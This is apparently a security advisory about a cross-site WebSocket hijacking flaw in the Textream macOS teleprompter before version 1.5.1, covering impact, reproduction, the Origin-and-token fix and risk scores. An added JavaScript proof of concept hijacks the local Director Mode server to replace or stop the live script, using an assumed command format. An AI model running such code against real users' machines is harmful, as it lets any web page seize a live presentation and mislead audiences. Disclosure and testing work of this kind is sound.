Textream WebSocket Server Cross-Site WebSocket Hijacking Vulnerability

Vulnerability

A Cross-Site WebSocket Hijacking (CSWSH) vulnerability has been identified in Textream, a free macOS teleprompter application, in versions prior to 1.5.1. The `DirectorServer` WebSocket server accepts connections from any origin: it neither validates the HTTP `Origin` header during the WebSocket handshake nor requires any credential. Because the listener is bound to the loopback interface and a browser attaches the calling page's `Origin` to every WebSocket handshake, any web page open in a browser on that machine (no cookie, login or user interaction is needed) can silently connect to the local WebSocket server and send arbitrary `DirectorCommand` payloads, taking full control of the teleprompter content. Version 1.5.1 addresses this vulnerability.

Impact

Exploitation allows unauthorized remote control of the teleprompter content during a live presentation. Any website open in a browser on the presenter's machine can replace, modify, or delete the script being displayed, which may disrupt the presentation or put misinformation in front of the speaker and audience. The `stop` command can additionally be used to terminate an active Director Mode session.

Reproduction

To reproduce, start Textream and activate 'Director Mode', which opens a WebSocket listener on `ws://127.0.0.1:7576`. While the session is active, open any web page in a browser on the same machine and, from the developer console, open a WebSocket to the local server and send a command that replaces the live teleprompter script with text of your choice, such as 'You have been hijacked.'. The handshake succeeds regardless of the page's origin, and the script is replaced immediately, without any interaction within the Textream app.
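The console step above, written out as an added example; it is not part of the advisory and not Textream's code. The `DirectorCommand` JSON shape used here (`{ type, text }` with a `replaceScript` type, and `{ type: "stop" }`) is an assumption for illustration, since the advisory does not publish the real schema. The `WebSocket` constructor is injectable so the flow can be exercised against a stub without a running server.

```javascript
// Added example, not from the advisory or from Textream: a browser-console
// proof of concept for the cross-site WebSocket hijack. Pasted into the
// devtools console of ANY web page while Director Mode is active, it
// connects with that page's Origin; a server that ignores Origin and asks
// for no credential accepts the connection and the command.

const DIRECTOR_URL = "ws://127.0.0.1:7576"; // listener named in the advisory

// ASSUMED command shape: the advisory names DirectorCommand, not its schema.
function buildReplaceCommand(text) {
  return JSON.stringify({ type: "replaceScript", text });
}

// ASSUMED shape for the `stop` command mentioned under Impact.
function buildStopCommand() {
  return JSON.stringify({ type: "stop" });
}

// Connect, send one command as soon as the handshake completes, then close.
// Resolves with the command string that was sent. `WS` defaults to the
// browser's WebSocket; a stub can be passed to exercise the flow offline.
function hijack(command, url = DIRECTOR_URL, WS = globalThis.WebSocket) {
  return new Promise((resolve, reject) => {
    const sock = new WS(url);
    sock.onopen = () => {
      sock.send(command); // no Origin check, no token: this is the whole attack
      sock.close();
      resolve(command);
    };
    sock.onerror = () =>
      reject(new Error("handshake failed: Director Mode off, or server now checks Origin/token"));
  });
}

// In a real browser console (no stub) this replaces the live script at once:
// hijack(buildReplaceCommand("You have been hijacked."));
```

Because the server performs no check at all, the same call works from a plain `http://` page, a `file://` page, or a sandboxed frame; the only precondition is that Director Mode is listening on the presenter's machine.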

Remediation

Users are advised to update to Textream version 1.5.1 or later. The fix validates the `Origin` header of WebSocket handshakes and requires an authentication token for WebSocket connections. The two checks complement each other: an `Origin` allowlist only constrains browser clients, since any non-browser process on the machine can send whatever `Origin` it likes, while the token also keeps such local processes from issuing commands.

Added: Mar 2, 2026, 4:20 PM
Updated: Mar 2, 2026, 9:41 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.6
exploitability: 7.5
remediation: 0.0
relevance: 3.4
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.